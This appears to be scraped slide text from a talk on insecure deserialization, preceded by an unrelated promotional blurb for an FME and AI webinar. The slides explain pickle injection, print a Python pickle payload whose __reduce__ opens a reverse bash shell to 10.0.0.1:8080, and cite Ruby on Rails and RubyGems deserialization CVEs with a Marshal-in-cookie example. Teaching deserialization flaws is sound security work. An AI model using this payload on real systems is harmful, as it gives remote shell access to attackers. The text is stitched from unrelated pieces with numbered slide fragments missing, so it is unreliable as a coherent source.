This webinar is ideal for professionals seeking to harness the power of AI within their data management systems while ensuring high levels of customization and security. Whether you're a novice or an expert, gain actionable insights and strategies to elevate your data processes. Join us to see how FME and AI can revolutionize how you work with data!
20. Old <Legitimate pickle>…S’<html><body>Foo…’n
<Legitimate pickle>
New <Legitimate pickle>…S’<html><body>
<Instruction returning string>…’n
<Legitimate pickle>
Result Identically-typed object to original with new attribute value
assigned by executed instructions
21.
22.
23. import pickle
import socket
import os
class payload(object):
def __reduce__(self):
comm = "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"
return (os.system, (comm,))
payload = pickle.dumps( payload())
28. CVE-2013-0156 Ruby on Rails XML processor YAML deserialization
code execution
Unsafe Object Deserialization Vulnerability in
RubyGems
CVE-2017-0903
29. Ruby on Rails (<4.1 by default) used Marshal.load() on user cookies
<div class="content">
<%= hidden_field_tag 'user', Base64.encode64(Marshal.dump(@user)) %>
…
</div>